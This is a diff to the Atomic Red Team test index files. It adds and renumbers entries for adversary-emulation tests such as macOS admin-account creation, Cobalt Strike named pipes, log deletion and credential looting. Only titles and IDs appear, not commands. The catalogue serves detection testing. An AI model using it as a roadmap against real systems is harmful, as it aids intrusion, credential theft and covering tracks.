 defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,6,Hide a Directory,b115ecaf-3b24-4ed2-aefe-2fcb9db913d3,sh
 defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,7,Show all hidden files,9a1ec7da-b892-449f-ad68-67066d04380c,sh
 defense-evasion,T1078.003,Valid Accounts: Local Accounts,2,Create local account with admin privileges - MacOS,f1275566-1c26-4b66-83e3-7f9f7f964daa,bash
+defense-evasion,T1078.003,Valid Accounts: Local Accounts,3,Create local account with admin privileges using sysadminctl utility - MacOS,191db57d-091a-47d5-99f3-97fde53de505,bash
+defense-evasion,T1078.003,Valid Accounts: Local Accounts,4,Enable root account using dsenableroot utility - MacOS,20b40ea9-0e17-4155-b8e6-244911a678ac,bash
+defense-evasion,T1078.003,Valid Accounts: Local Accounts,5,Add a new/existing user to the admin group using dseditgroup utility - macOS,433842ba-e796-4fd5-a14f-95d3a1970875,bash
 collection,T1560.001,Archive Collected Data: Archive via Utility,5,Data Compressed - nix - zip,c51cec55-28dd-4ad2-9461-1eacbc82c3a0,sh
 collection,T1560.001,Archive Collected Data: Archive via Utility,6,Data Compressed - nix - gzip Single File,cde3c2af-3485-49eb-9c1f-0ed60e9cc0af,sh
 collection,T1560.001,Archive Collected Data: Archive via Utility,7,Data Compressed - nix - tar Folder or File,7af2b51e-ad1c-498c-aca8-d3290c19535a,sh
@@ -102,6 +117,9 @@ persistence,T1547.007,Boot or Logon Autostart Execution: Re-opened Applications,
 persistence,T1547.007,Boot or Logon Autostart Execution: Re-opened Applications,2,Re-Opened Applications using LoginHook,5f5b71da-e03f-42e7-ac98-d63f9e0465cb,sh
 persistence,T1547.007,Boot or Logon Autostart Execution: Re-opened Applications,3,Append to existing loginwindow for Re-Opened Applications,766b6c3c-9353-4033-8b7e-38b309fa3a93,sh
 persistence,T1078.003,Valid Accounts: Local Accounts,2,Create local account with admin privileges - MacOS,f1275566-1c26-4b66-83e3-7f9f7f964daa,bash
+persistence,T1078.003,Valid Accounts: Local Accounts,3,Create local account with admin privileges using sysadminctl utility - MacOS,191db57d-091a-47d5-99f3-97fde53de505,bash
+persistence,T1078.003,Valid Accounts: Local Accounts,4,Enable root account using dsenableroot utility - MacOS,20b40ea9-0e17-4155-b8e6-244911a678ac,bash
+persistence,T1078.003,Valid Accounts: Local Accounts,5,Add a new/existing user to the admin group using dseditgroup utility - macOS,433842ba-e796-4fd5-a14f-95d3a1970875,bash
 privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-48a6-aeaf-3659d24ceb4e,sh
 privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,2,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh
 privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,3,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh
@@ -129,6 +147,9 @@ privilege-escalation,T1547.007,Boot or Logon Autostart Execution: Re-opened Appl
 privilege-escalation,T1547.007,Boot or Logon Autostart Execution: Re-opened Applications,2,Re-Opened Applications using LoginHook,5f5b71da-e03f-42e7-ac98-d63f9e0465cb,sh
 privilege-escalation,T1547.007,Boot or Logon Autostart Execution: Re-opened Applications,3,Append to existing loginwindow for Re-Opened Applications,766b6c3c-9353-4033-8b7e-38b309fa3a93,sh
 privilege-escalation,T1078.003,Valid Accounts: Local Accounts,2,Create local account with admin privileges - MacOS,f1275566-1c26-4b66-83e3-7f9f7f964daa,bash
+privilege-escalation,T1078.003,Valid Accounts: Local Accounts,3,Create local account with admin privileges using sysadminctl utility - MacOS,191db57d-091a-47d5-99f3-97fde53de505,bash
+privilege-escalation,T1078.003,Valid Accounts: Local Accounts,4,Enable root account using dsenableroot utility - MacOS,20b40ea9-0e17-4155-b8e6-244911a678ac,bash
+privilege-escalation,T1078.003,Valid Accounts: Local Accounts,5,Add a new/existing user to the admin group using dseditgroup utility - macOS,433842ba-e796-4fd5-a14f-95d3a1970875,bash
 credential-access,T1056.001,Input Capture: Keylogging,7,MacOS Swift Keylogger,aee3a097-4c5c-4fff-bbd3-0a705867ae29,bash
 credential-access,T1555.001,Credentials from Password Stores: Keychain,1,Keychain,1864fdec-ff86-4452-8c30-f12507582a93,sh
 credential-access,T1040,Network Sniffing,2,Packet Capture macOS using tcpdump or tshark,9d04efee-eff5-4240-b8d2-07792b873608,bash
@@ -204,6 +225,9 @@ execution,T1569.001,System Services: Launchctl,1,Launchctl,6fb61988-724e-4755-a5
 execution,T1059.004,Command and Scripting Interpreter: Bash,1,Create and Execute Bash Shell Script,7e7ac3ed-f795-4fa5-b711-09d6fbe9b873,sh
 execution,T1059.004,Command and Scripting Interpreter: Bash,2,Command-Line Interface,d0c88567-803d-4dca-99b4-7ce65e7b257c,sh
 initial-access,T1078.003,Valid Accounts: Local Accounts,2,Create local account with admin privileges - MacOS,f1275566-1c26-4b66-83e3-7f9f7f964daa,bash
+initial-access,T1078.003,Valid Accounts: Local Accounts,3,Create local account with admin privileges using sysadminctl utility - MacOS,191db57d-091a-47d5-99f3-97fde53de505,bash
+initial-access,T1078.003,Valid Accounts: Local Accounts,4,Enable root account using dsenableroot utility - MacOS,20b40ea9-0e17-4155-b8e6-244911a678ac,bash
+initial-access,T1078.003,Valid Accounts: Local Accounts,5,Add a new/existing user to the admin group using dseditgroup utility - macOS,433842ba-e796-4fd5-a14f-95d3a1970875,bash
 exfiltration,T1048.002,Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol,2,Exfiltrate data HTTPS using curl linux,4a4f31e2-46ea-4c26-ad89-f09ad1d5fe01,bash
 exfiltration,T1048,Exfiltration Over Alternative Protocol,1,Exfiltration Over Alternative Protocol - SSH,f6786cc8-beda-4915-a4d6-ac2f193bb988,sh
 exfiltration,T1048,Exfiltration Over Alternative Protocol,2,Exfiltration Over Alternative Protocol - SSH,7c3cb337-35ae-4d06-bf03-3032ed2ec268,sh

atomics/Indexes/Indexes-CSV/windows-index.csv

@@ -172,6 +172,7 @@ defense-evasion,T1112,Modify Registry,45,Mimic Ransomware - Enable Multiple User
 defense-evasion,T1112,Modify Registry,46,Mimic Ransomware - Allow Multiple RDP Sessions per User,35727d9e-7a7f-4d0c-a259-dc3906d6e8b9,command_prompt
 defense-evasion,T1112,Modify Registry,47,Event Viewer Registry Modification - Redirection URL,6174be7f-5153-4afd-92c5-e0c3b7cdb5ae,command_prompt
 defense-evasion,T1112,Modify Registry,48,Event Viewer Registry Modification - Redirection Program,81483501-b8a5-4225-8b32-52128e2f69db,command_prompt
+defense-evasion,T1112,Modify Registry,49,Enabling Remote Desktop Protocol via Remote Registry,e3ad8e83-3089-49ff-817f-e52f8c948090,command_prompt
 defense-evasion,T1574.008,Hijack Execution Flow: Path Interception by Search Order Hijacking,1,powerShell Persistence via hijacking default modules - Get-Variable.exe,1561de08-0b4b-498e-8261-e922f3494aae,powershell
 defense-evasion,T1484.001,Domain Policy Modification: Group Policy Modification,1,LockBit Black - Modify Group policy settings -cmd,9ab80952-74ee-43da-a98c-1e740a985f28,command_prompt
 defense-evasion,T1484.001,Domain Policy Modification: Group Policy Modification,2,LockBit Black - Modify Group policy settings -Powershell,b51eae65-5441-4789-b8e8-64783c26c1d1,powershell
@@ -330,8 +331,8 @@ defense-evasion,T1055.001,Process Injection: Dynamic-link Library Injection,2,Wi
 defense-evasion,T1216,Signed Script Proxy Execution,1,SyncAppvPublishingServer Signed Script PowerShell Command Execution,275d963d-3f36-476c-8bef-a2a3960ee6eb,command_prompt
 defense-evasion,T1216,Signed Script Proxy Execution,2,manage-bde.wsf Signed Script Command Execution,2a8f2d3c-3dec-4262-99dd-150cb2a4d63a,command_prompt
 defense-evasion,T1078.003,Valid Accounts: Local Accounts,1,Create local account with admin privileges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
-defense-evasion,T1078.003,Valid Accounts: Local Accounts,3,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
-defense-evasion,T1078.003,Valid Accounts: Local Accounts,4,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
+defense-evasion,T1078.003,Valid Accounts: Local Accounts,6,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
+defense-evasion,T1078.003,Valid Accounts: Local Accounts,7,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
 defense-evasion,T1127,Trusted Developer Utilities Proxy Execution,1,Lolbin Jsc.exe compile javascript to exe,1ec1c269-d6bd-49e7-b71b-a461f7fa7bc8,command_prompt
 defense-evasion,T1127,Trusted Developer Utilities Proxy Execution,2,Lolbin Jsc.exe compile javascript to dll,3fc9fea2-871d-414d-8ef6-02e85e322b80,command_prompt
 defense-evasion,T1574.012,Hijack Execution Flow: COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
@@ -380,6 +381,7 @@ privilege-escalation,T1543.003,Create or Modify System Process: Windows Service,
 privilege-escalation,T1543.003,Create or Modify System Process: Windows Service,2,Service Installation CMD,981e2942-e433-44e9-afc1-8c957a1496b6,command_prompt
 privilege-escalation,T1543.003,Create or Modify System Process: Windows Service,3,Service Installation PowerShell,491a4af6-a521-4b74-b23b-f7b3f1ee9e77,powershell
 privilege-escalation,T1543.003,Create or Modify System Process: Windows Service,4,TinyTurla backdoor service w64time,ef0581fd-528e-4662-87bc-4c2affb86940,command_prompt
+privilege-escalation,T1543.003,Create or Modify System Process: Windows Service,5,Remote Service Installation CMD,fb4151a2-db33-4f8c-b7f8-78ea8790f961,command_prompt
 privilege-escalation,T1574.001,Hijack Execution Flow: DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
 privilege-escalation,T1055.003,Thread Execution Hijacking,1,Thread Execution Hijacking,578025d5-faa9-4f6d-8390-aae527d503e1,powershell
 privilege-escalation,T1546.011,Event Triggered Execution: Application Shimming,1,Application Shim Installation,9ab27e22-ee62-4211-962b-d36d9a0e6a18,command_prompt
@@ -448,6 +450,7 @@ privilege-escalation,T1055.012,Process Injection: Process Hollowing,2,RunPE via
 privilege-escalation,T1546,Event Triggered Execution,1,Persistence with Custom AutodialDLL,aca9ae16-7425-4b6d-8c30-cad306fdbd5b,powershell
 privilege-escalation,T1546,Event Triggered Execution,2,HKLM - Persistence using CommandProcessor AutoRun key (With Elevation),a574dafe-a903-4cce-9701-14040f4f3532,powershell
 privilege-escalation,T1546,Event Triggered Execution,3,HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation),36b8dbf9-59b1-4e9b-a3bb-36e80563ef01,powershell
+privilege-escalation,T1546,Event Triggered Execution,4,WMI Invoke-CimMethod Start Process,adae83d3-0df6-45e7-b2c3-575f91584577,powershell
 privilege-escalation,T1134.005,Access Token Manipulation: SID-History Injection,1,Injection SID-History with mimikatz,6bef32e5-9456-4072-8f14-35566fb85401,command_prompt
 privilege-escalation,T1547.002,Authentication Package,1,Authentication Package,be2590e8-4ac3-47ac-b4b5-945820f2fbe9,powershell
 privilege-escalation,T1546.015,Event Triggered Execution: Component Object Model Hijacking,1,COM Hijacking - InprocServer32,48117158-d7be-441b-bc6a-d9e36e47b52b,powershell
@@ -466,8 +469,8 @@ privilege-escalation,T1055.001,Process Injection: Dynamic-link Library Injection
 privilege-escalation,T1055.001,Process Injection: Dynamic-link Library Injection,2,WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique,8b56f787-73d9-4f1d-87e8-d07e89cbc7f5,powershell
 privilege-escalation,T1546.007,Event Triggered Execution: Netsh Helper DLL,1,Netsh Helper DLL Registration,3244697d-5a3a-4dfc-941c-550f69f91a4d,command_prompt
 privilege-escalation,T1078.003,Valid Accounts: Local Accounts,1,Create local account with admin privileges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
-privilege-escalation,T1078.003,Valid Accounts: Local Accounts,3,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
-privilege-escalation,T1078.003,Valid Accounts: Local Accounts,4,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
+privilege-escalation,T1078.003,Valid Accounts: Local Accounts,6,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
+privilege-escalation,T1078.003,Valid Accounts: Local Accounts,7,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
 privilege-escalation,T1574.012,Hijack Execution Flow: COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
 privilege-escalation,T1574.012,Hijack Execution Flow: COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
 privilege-escalation,T1574.012,Hijack Execution Flow: COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
@@ -534,6 +537,11 @@ execution,T1059.001,Command and Scripting Interpreter: PowerShell,19,PowerShell
 execution,T1059.001,Command and Scripting Interpreter: PowerShell,20,PowerShell Invoke Known Malicious Cmdlets,49eb9404-5e0f-4031-a179-b40f7be385e3,powershell
 execution,T1059.001,Command and Scripting Interpreter: PowerShell,21,PowerUp Invoke-AllChecks,1289f78d-22d2-4590-ac76-166737e1811b,powershell
 execution,T1059.001,Command and Scripting Interpreter: PowerShell,22,Abuse Nslookup with DNS Records,999bff6d-dc15-44c9-9f5c-e1051bfc86e1,powershell
+execution,T1559,Inter-Process Communication,1,Cobalt Strike Artifact Kit pipe,bd13b9fc-b758-496a-b81a-397462f82c72,command_prompt
+execution,T1559,Inter-Process Communication,2,Cobalt Strike Lateral Movement (psexec_psh) pipe,830c8b6c-7a70-4f40-b975-8bbe74558acd,command_prompt
+execution,T1559,Inter-Process Communication,3,Cobalt Strike SSH (postex_ssh) pipe,d1f72fa0-5bc2-4b4b-bd1e-43b6e8cfb2e6,command_prompt
+execution,T1559,Inter-Process Communication,4,Cobalt Strike post-exploitation pipe (4.2 and later),7a48f482-246f-4aeb-9837-21c271ebf244,command_prompt
+execution,T1559,Inter-Process Communication,5,Cobalt Strike post-exploitation pipe (before 4.2),8dbfc15c-527b-4ab0-a272-019f469d367f,command_prompt
 execution,T1059.003,Command and Scripting Interpreter: Windows Command Shell,1,Create and Execute Batch Script,9e8894c0-50bd-4525-a96c-d4ac78ece388,powershell
 execution,T1059.003,Command and Scripting Interpreter: Windows Command Shell,2,Writes text to a file and displays it.,127b4afe-2346-4192-815c-69042bec570e,command_prompt
 execution,T1059.003,Command and Scripting Interpreter: Windows Command Shell,3,Suspicious Execution via Windows Command Shell,d0eb3597-a1b3-4d65-b33b-2cda8d397f20,command_prompt
@@ -545,6 +553,7 @@ execution,T1059.005,Command and Scripting Interpreter: Visual Basic,3,Extract Me
 execution,T1569.002,System Services: Service Execution,1,Execute a Command as a Service,2382dee2-a75f-49aa-9378-f52df6ed3fb1,command_prompt
 execution,T1569.002,System Services: Service Execution,2,Use PsExec to execute a command on a remote host,873106b7-cfed-454b-8680-fa9f6400431c,command_prompt
 execution,T1569.002,System Services: Service Execution,4,BlackCat pre-encryption cmds with Lateral Movement,31eb7828-97d7-4067-9c1e-c6feb85edc4b,powershell
+execution,T1569.002,System Services: Service Execution,5,Use RemCom to execute a command on a remote host,a5d8cdeb-be90-43a9-8b26-cc618deac1e0,command_prompt
 execution,T1053.002,Scheduled Task/Job: At,1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt
 persistence,T1053.005,Scheduled Task/Job: Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt
 persistence,T1053.005,Scheduled Task/Job: Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt
@@ -567,6 +576,7 @@ persistence,T1543.003,Create or Modify System Process: Windows Service,1,Modify
 persistence,T1543.003,Create or Modify System Process: Windows Service,2,Service Installation CMD,981e2942-e433-44e9-afc1-8c957a1496b6,command_prompt
 persistence,T1543.003,Create or Modify System Process: Windows Service,3,Service Installation PowerShell,491a4af6-a521-4b74-b23b-f7b3f1ee9e77,powershell
 persistence,T1543.003,Create or Modify System Process: Windows Service,4,TinyTurla backdoor service w64time,ef0581fd-528e-4662-87bc-4c2affb86940,command_prompt
+persistence,T1543.003,Create or Modify System Process: Windows Service,5,Remote Service Installation CMD,fb4151a2-db33-4f8c-b7f8-78ea8790f961,command_prompt
 persistence,T1137,Office Application Startup,1,Office Application Startup - Outlook as a C2,bfe6ac15-c50b-4c4f-a186-0fc6b8ba936c,command_prompt
 persistence,T1574.001,Hijack Execution Flow: DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
 persistence,T1137.006,Office Application Startup: Add-ins,1,Code Executed Via Excel Add-in File (XLL),441b1a0f-a771-428a-8af0-e99e4698cda3,powershell
@@ -639,6 +649,7 @@ persistence,T1505.004,IIS Components,2,Install IIS Module using PowerShell Cmdle
 persistence,T1546,Event Triggered Execution,1,Persistence with Custom AutodialDLL,aca9ae16-7425-4b6d-8c30-cad306fdbd5b,powershell
 persistence,T1546,Event Triggered Execution,2,HKLM - Persistence using CommandProcessor AutoRun key (With Elevation),a574dafe-a903-4cce-9701-14040f4f3532,powershell
 persistence,T1546,Event Triggered Execution,3,HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation),36b8dbf9-59b1-4e9b-a3bb-36e80563ef01,powershell
+persistence,T1546,Event Triggered Execution,4,WMI Invoke-CimMethod Start Process,adae83d3-0df6-45e7-b2c3-575f91584577,powershell
 persistence,T1547.002,Authentication Package,1,Authentication Package,be2590e8-4ac3-47ac-b4b5-945820f2fbe9,powershell
 persistence,T1546.015,Event Triggered Execution: Component Object Model Hijacking,1,COM Hijacking - InprocServer32,48117158-d7be-441b-bc6a-d9e36e47b52b,powershell
 persistence,T1546.015,Event Triggered Execution: Component Object Model Hijacking,2,Powershell Execute COM Object,752191b1-7c71-445c-9dbe-21bb031b18eb,powershell
@@ -660,8 +671,8 @@ persistence,T1547.008,Boot or Logon Autostart Execution: LSASS Driver,1,Modify R
 persistence,T1053.002,Scheduled Task/Job: At,1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt
 persistence,T1546.007,Event Triggered Execution: Netsh Helper DLL,1,Netsh Helper DLL Registration,3244697d-5a3a-4dfc-941c-550f69f91a4d,command_prompt
 persistence,T1078.003,Valid Accounts: Local Accounts,1,Create local account with admin privileges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
-persistence,T1078.003,Valid Accounts: Local Accounts,3,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
-persistence,T1078.003,Valid Accounts: Local Accounts,4,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
+persistence,T1078.003,Valid Accounts: Local Accounts,6,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
+persistence,T1078.003,Valid Accounts: Local Accounts,7,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
 persistence,T1574.012,Hijack Execution Flow: COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
 persistence,T1574.012,Hijack Execution Flow: COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
 persistence,T1574.012,Hijack Execution Flow: COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
@@ -714,7 +725,7 @@ lateral-movement,T1021.001,Remote Services: Remote Desktop Protocol,3,Changing R
 credential-access,T1056.001,Input Capture: Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell
 credential-access,T1110.001,Brute Force: Password Guessing,1,Brute Force Credentials of single Active Directory domain users via SMB,09480053-2f98-4854-be6e-71ae5f672224,command_prompt
 credential-access,T1110.001,Brute Force: Password Guessing,2,Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos),c2969434-672b-4ec8-8df0-bbb91f40e250,powershell
-credential-access,T1110.001,Brute Force: Password Guessing,6,Password Brute User using Kerbrute Tool,59dbeb1a-79a7-4c2a-baf4-46d0f4c761c4,powershell
+credential-access,T1110.001,Brute Force: Password Guessing,4,Password Brute User using Kerbrute Tool,59dbeb1a-79a7-4c2a-baf4-46d0f4c761c4,powershell
 credential-access,T1003,OS Credential Dumping,1,Gsecdump,96345bfc-8ae7-4b6a-80b7-223200f24ef9,command_prompt
 credential-access,T1003,OS Credential Dumping,2,Credential Dumping with NPPSpy,9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6,powershell
 credential-access,T1003,OS Credential Dumping,3,Dump svchost.exe to gather RDP credentials,d400090a-d8ca-4be0-982e-c70598a23de9,powershell
@@ -831,6 +842,7 @@ discovery,T1033,System Owner/User Discovery,1,System Owner/User Discovery,4c4959
 discovery,T1033,System Owner/User Discovery,3,Find computers where user has session - Stealth mode (PowerView),29857f27-a36f-4f7e-8084-4557cd6207ca,powershell
 discovery,T1033,System Owner/User Discovery,4,User Discovery With Env Vars PowerShell Script,dcb6cdee-1fb0-4087-8bf8-88cfd136ba51,powershell
 discovery,T1033,System Owner/User Discovery,5,GetCurrent User with PowerShell Script,1392bd0f-5d5a-429e-81d9-eb9d4d4d5b3b,powershell
+discovery,T1033,System Owner/User Discovery,6,System Discovery - SocGholish whoami,3d257a03-eb80-41c5-b744-bb37ac7f65c7,powershell
 discovery,T1615,Group Policy Discovery,1,Display group policy information via gpresult,0976990f-53b1-4d3f-a185-6df5be429d3b,command_prompt
 discovery,T1615,Group Policy Discovery,2,Get-DomainGPO to display group policy information via PowerView,4e524c4e-0e02-49aa-8df5-93f3f7959b9f,powershell
 discovery,T1615,Group Policy Discovery,3,WinPwn - GPOAudit,bc25c04b-841e-4965-855f-d1f645d7ab73,powershell
@@ -932,6 +944,7 @@ discovery,T1057,Process Discovery,2,Process Discovery - tasklist,c5806a4f-62b8-4
 discovery,T1057,Process Discovery,3,Process Discovery - Get-Process,3b3809b6-a54b-4f5b-8aff-cb51f2e97b34,powershell
 discovery,T1057,Process Discovery,4,Process Discovery - get-wmiObject,b51239b4-0129-474f-a2b4-70f855b9f2c2,powershell
 discovery,T1057,Process Discovery,5,Process Discovery - wmic process,640cbf6d-659b-498b-ba53-f6dd1a1cc02c,command_prompt
+discovery,T1057,Process Discovery,6,Discover Specific Process - tasklist,11ba69ee-902e-4a0f-b3b6-418aed7d7ddb,command_prompt
 discovery,T1069.001,Permission Groups Discovery: Local Groups,2,Basic Permission Groups Discovery Windows (Local),1f454dd6-e134-44df-bebb-67de70fb6cd8,command_prompt
 discovery,T1069.001,Permission Groups Discovery: Local Groups,3,Permission Groups Discovery PowerShell (Local),a580462d-2c19-4bc7-8b9a-57a41b7d3ba4,powershell
 discovery,T1069.001,Permission Groups Discovery: Local Groups,4,SharpHound3 - LocalAdmin,e03ada14-0980-4107-aff1-7783b2b59bb1,powershell
@@ -945,7 +958,8 @@ discovery,T1201,Password Policy Discovery,10,Use of SecEdit.exe to export the lo
 discovery,T1614.001,System Location Discovery: System Language Discovery,1,Discover System Language by Registry Query,631d4cf1-42c9-4209-8fe9-6bd4de9421be,command_prompt
 discovery,T1614.001,System Location Discovery: System Language Discovery,2,Discover System Language with chcp,d91473ca-944e-477a-b484-0e80217cd789,command_prompt
 discovery,T1012,Query Registry,1,Query Registry,8f7578c4-9863-4d83-875c-a565573bbdf0,command_prompt
-discovery,T1012,Query Registry,2,Enumerate COM Objects in Registry with Powershell,0d80d088-a84c-4353-af1a-fc8b439f1564,powershell
+discovery,T1012,Query Registry,2,Query Registry with Powershell cmdlets,0434d081-bb32-42ce-bcbb-3548e4f2628f,powershell
+discovery,T1012,Query Registry,3,Enumerate COM Objects in Registry with Powershell,0d80d088-a84c-4353-af1a-fc8b439f1564,powershell
 discovery,T1518.001,Software Discovery: Security Software Discovery,1,Security Software Discovery,f92a380f-ced9-491f-b338-95a991418ce2,command_prompt
 discovery,T1518.001,Software Discovery: Security Software Discovery,2,Security Software Discovery - powershell,7f566051-f033-49fb-89de-b6bacab730f0,powershell
 discovery,T1518.001,Software Discovery: Security Software Discovery,5,Security Software Discovery - Sysmon Service,fe613cf3-8009-4446-9a0f-bc78a15b66c9,command_prompt
@@ -1061,8 +1075,8 @@ initial-access,T1195,Supply Chain Compromise,1,Octopus Scanner Malware Open Sour
 initial-access,T1078.001,Valid Accounts: Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
 initial-access,T1078.001,Valid Accounts: Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt
 initial-access,T1078.003,Valid Accounts: Local Accounts,1,Create local account with admin privileges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
-initial-access,T1078.003,Valid Accounts: Local Accounts,3,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
-initial-access,T1078.003,Valid Accounts: Local Accounts,4,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
+initial-access,T1078.003,Valid Accounts: Local Accounts,6,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
+initial-access,T1078.003,Valid Accounts: Local Accounts,7,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
 exfiltration,T1020,Automated Exfiltration,1,IcedID Botnet HTTP PUT,9c780d3d-3a14-4278-8ee5-faaeb2ccfbe0,powershell
 exfiltration,T1048.002,Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol,1,Exfiltrate data HTTPS using curl windows,1cdf2fb0-51b6-4fd8-96af-77020d5f1bf0,command_prompt
 exfiltration,T1041,Exfiltration Over C2 Channel,1,C2 Data Exfiltration,d1253f6e-c29b-49dc-b466-2147a6191932,powershell

atomics/Indexes/Indexes-Markdown/containers-index.md

@@ -70,7 +70,8 @@
   - Atomic Test #1: Deploy Docker container [containers]
 - T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1070 Indicator Removal on Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1612 Build Image on Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1612 Build Image on Host](../../T1612/T1612.md)
+  - Atomic Test #1: Build Image On Host [containers]
 - T1562.001 Impair Defenses: Disable or Modify Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1550.001 Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

atomics/Indexes/Indexes-Markdown/index.md

@@ -108,8 +108,20 @@
   - Atomic Test #4: Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows) [windows]
 - [T1070.002 Indicator Removal on Host: Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md)
   - Atomic Test #1: rm -rf [macos, linux]
-  - Atomic Test #2: Overwrite Linux Mail Spool [linux]
-  - Atomic Test #3: Overwrite Linux Log [linux]
+  - Atomic Test #2: Delete log files using built-in log utility [macos]
+  - Atomic Test #3: Truncate system log files via truncate utility [macos]
+  - Atomic Test #4: Delete log files via cat utility by appending /dev/null or /dev/zero [macos]
+  - Atomic Test #5: System log file deletion via find utility [macos]
+  - Atomic Test #6: Overwrite macOS system log via echo utility [macos]
+  - Atomic Test #7: Real-time system log clearance/deletion [macos]
+  - Atomic Test #8: Delete system log files via unlink utility [macos]
+  - Atomic Test #9: Delete system log files using shred utility [macos]
+  - Atomic Test #10: Delete system log files using srm utility [macos]
+  - Atomic Test #11: Delete system log files using OSAScript [macos]
+  - Atomic Test #12: Delete system log files using Applescript [macos]
+  - Atomic Test #13: Delete system journal logs via rm and journalctl utilities [linux]
+  - Atomic Test #14: Overwrite Linux Mail Spool [linux]
+  - Atomic Test #15: Overwrite Linux Log [linux]
 - [T1218.004 Signed Binary Proxy Execution: InstallUtil](../../T1218.004/T1218.004.md)
   - Atomic Test #1: CheckIfInstallable method call [windows]
   - Atomic Test #2: InstallHelper method call [windows]
@@ -174,6 +186,8 @@
   - Atomic Test #7: Linux Base64 Encoded Shebang in CLI [linux, macos]
 - [T1562 Impair Defenses](../../T1562/T1562.md)
   - Atomic Test #1: Windows Disable LSA Protection [windows]
+  - Atomic Test #2: Disable journal logging via systemctl utility [linux]
+  - Atomic Test #3: Disable journal logging via sed utility [linux]
 - [T1055.003 Thread Execution Hijacking](../../T1055.003/T1055.003.md)
